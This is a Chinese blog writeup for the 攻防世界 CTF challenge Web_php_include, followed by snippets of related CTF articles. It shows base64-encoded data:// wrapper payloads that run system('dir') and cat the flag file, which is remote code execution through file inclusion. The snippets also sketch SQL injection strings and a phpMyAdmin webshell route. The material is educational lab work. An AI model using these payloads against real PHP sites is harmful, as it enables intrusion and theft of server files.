攻防世界web Web_php_include writeup

最新推荐文章于 2024-04-20 18:10:57 发布
最新推荐文章于 2024-04-20 18:10:57 发布
阅读量155 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45837896/article/details/107430529
版权

在这里插入图片描述看题目所给,页面会把所有传入页面url的php://给替换掉

查询php://得知应该是php伪协议的知识点

从官网得知data://伪协议从而不使用php://

用法:data://text/plain;base64,

也就是说页面会执行后面的base64代码

用语句`

<?php system("dir")?>

base64编码得
PD9waHAgc3lzdGVtKCJkaXIiKT8+(使用的时候+要url编码)
得页面
在这里插入图片描述得知fl4gisisish3r3.php文件

<?php system("cat fl4gisisish3r3.php")?>

base64编码后
PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

得页面并查看源码

在这里插入图片描述

Sprint#51264
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界XCTF—web入门题知识点、进阶提高题Writeup
AugenStern的博客
08-21 861
WriteUpXCTF-Web新手入门区view_sourceget_postrobotsbackupcookiedisabled buttonsimple jsxff refererweak authwebshellcommand executionsimple_php高手进阶区 XCTF-Web 2016 年全国大学生信息安全竞赛开始设立创新实践技能赛,采取的就是传统的 CTF 赛制。在《2016年全国大学生信息安全竞赛参赛指南》中主办方给出的竞赛内容相对全面,值得参考。 系统安全。 涉及操作系统和
攻防世界 web高手进阶区 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 1963
继续ctf的旅程,攻防世界web高手进阶区的7分题,本文是Web_php_wrong_nginx_config的writeup
攻防世界 Web_php_include write up
giaogiao123的博客
02-19 314
首先看题目注意两点 1要get方式提交page 2要绕过strstr()函数,要绕过str_replace函数因为他会把php://换成空 3文件包含(要想到一句话木马) 先补充一些知识关于php://input 因为strstr是对大小写敏感的,用大写PHP绕过检测,同时绕过str_replace函数 strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是...
【XCTF高手进阶区】web4_Web_php_include writeup(二)
Mitchell_Donovan的博客
01-28 2093
web4_Web_php_include 原题链接 key:data://伪协议执行命令 ①打开页面还是那串代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 但是这次我们选择另一种
【XCTF高手进阶区】web4_Web_php_include writeup(三)
Mitchell_Donovan的博客
01-28 277
web4_Web_php_include 原题链接 key:SQL注入+一句话木马 ①又双叒叕是这道题,不过这一次我们我们用一个更加风骚的解法 老话说得好,如果没思路了就去扫描一下???? 扫描发现了phpmyadmin后台???? ②双击它进入登录页面 username为root,password为空,登录???? ③进入SQL语句输入的地方 先输入并执行如下SQL语句???? show variables like "secure_file_priv"
攻防世界-web-backup-Writeup
baola的博客
06-16 400
攻防世界-web-backup 源码泄露由于网站开发人员忘记删除备份文件,直接上线项目,这对网站来说具有很大的安全隐患,攻击者可以通过下载泄露的源码备份文件,查看源码,从而进行信息收集。
攻防世界 web高手进阶区 10分题 biscuiti-300
闵行小鱼塘
11-07 1018
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是biscuiti-300的writeup
攻防世界 WEB 新手练习区 writeup 007-012
ChaoYue_miku的博客
09-02 1351
007 simple_php 难度系数:1.0 题目来源: Cyberpeace-n3k0 题目描述: 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 0x01 打开网页 有一段PHP源代码 0x02 进行代码审计 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numer
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
最新发布
2301_79054215的博客
04-20 836
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
攻防世界 web高手进阶区 7分题 comment
闵行小鱼塘
08-11 725
继续ctf的旅程,攻防世界web高手进阶区的7分题,本文是comment的writeup
XCTF攻防世界-Web-WriteUp
weixin_38912654的博客
12-17 809
目录 view_source get_post robots backup cookie disabled_button simple_js (本篇博客作为自己的学习记录,含有部分前辈大佬的码字,但是在操作上有更新之处,并且步骤较为详细,工具简单,介绍更为具体,特此记录以备回顾之需,也供其他学者借鉴,互相交流学习。) view_source 题目描述:X老师让小宁同学查看一个网...
攻防世界部分web题:Writeup
Sy0ung_的博客
05-21 277
打开网址,发现flag按钮不能点,想到和html按钮可能有关 按F12看源码, 把disabled删掉,flag按钮自动点亮,点击得到flag
攻防世界新手Web&Crypto writeup
极客剑寮
12-27 362
viewsource 直接f12,或者chrome在url前加view-source: getpost 直接加参数就行了。 POST参数不用工具直接加个form就行了。 robots 查看robots文件会得到一个php的文件,访问获得flag。 backup 下载文件index.php.bak获得flag。 cookie 查看cookie,可以知道存在cookie.p...
攻防世界Web练习区Writeup
weixin_42831646的博客
11-07 3257
一些工具 burpsuite SwitchyOmega:Chrome用的代理插件 view_source flag: cyberpeace{c0bffec917b3e51ebf26546ac2c88e79} Writeup 这个题打开之后右键没有反应,直接F12 robots flag: cyberpeace{829baa53f19972442c21944e8205697f} 首先介绍一下Robots是做什么的 Robots简介 1 什么是robots协议? robots协议也叫robots.txt(统一
XCTF攻防世界WebWriteUp
weixin_30692143的博客
06-27 598
XCTF攻防世界WebWriteUp 0x00 准备 【内容】 在xctf官网注册账号,即可食用。 【目录】 目录 0x01 view-source2 0x02 get post3 0x03 robots4 0x04 backup6 0x05 Cookie7 0x06 disabled button8 0x07 simple js9 0x08 XFF Refe...
攻防世界-web高级进阶-NewsCenter-WriteUp
weixin_46079186的博客
04-12 223
NewsCenter 打开页面,发现有个搜索框,猜测是sql注入 1.输入一个 ’ 页面出错 2. 在 ’ 后面输入 # 页面返回正常 3. 判断字段数 ’ and 1=2 order by 1 # 页面正常,输入 ’ and 1=2 order by 4 # 页面发生错误,说明有3个字段。 4. 判断回显点 'and 1=2 union select 1,2,3# 发现返回了2和3 5. 查看表名 ’ and 1=2 union select 1,table_name,3 from inf
攻防世界 web php include,XCTF攻防世界 Web Writeup (持续更新中)
weixin_27875131的博客
03-09 398
新手练习区view-sourceF12得到flag。get_postHackBar一把梭。robots访问robots.txt发现隐藏文件,进入该文件获得flag。backupindex.php的备份文件应该是index.php.bak,访问一下发现果然是,用记事本打开下载的文件得到flag。cookie看一下请求头发现cookie.php访问cookie.php,在响应头中有flag。disab...
攻防世界(Ctf-Web 新手练习区 Writeup)
weixin_30663391的博客
06-13 377
平台地址:adworld.xctf.org.cn 在打着暑假工赚零花钱之余,我将这些题利用空余时间刷了一遍,感觉内心还是比较满足的! 题目:view_source 这道题没啥好说的,在url的前面加上个 “view-source: ”就看到flag了 flag:cyberpeace{e07dcafaeeb31d...
攻防世界-web-bug-从0到1的解题历程writeup
CTF小白的博客
04-15 2181
题目分析 拿到题目首先注册了一下admin账号发现账号存在。然后后登陆后发现Manage需要admin权限,那么大概就是要获取到admin账号或者admin权限了。 尝试了一下发现 先输入自己注册的正确账号令其跳转到修改密码界面,然后修改username直接找回admin的密码即可 成功登陆admin账号 发现进入admin模块提示IP NOT allowed。 尝试修改IP添加请求头X-...
2020 YCBCTF羊城杯官方Writeup:PHPWeb安全解题技巧实录
2020YCBCTF羊城杯官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在WebPHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值